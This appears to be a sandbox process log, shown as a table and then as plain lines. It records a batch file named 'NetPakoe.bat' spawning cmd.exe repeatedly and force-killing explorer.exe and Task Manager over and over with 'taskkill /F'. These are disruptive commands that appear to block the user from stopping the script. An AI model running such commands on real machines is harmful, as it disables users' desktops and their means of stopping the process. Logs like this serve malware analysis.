| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe.bat |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im Task Manager.exe /F |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K NetPakoe |
| C:\Windows\explorer.exe | explorer |
| C:\Windows\system32\taskkill.exe | taskkill /im explorer.exe /F |
| C:\Windows\explorer.exe | explorer |
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
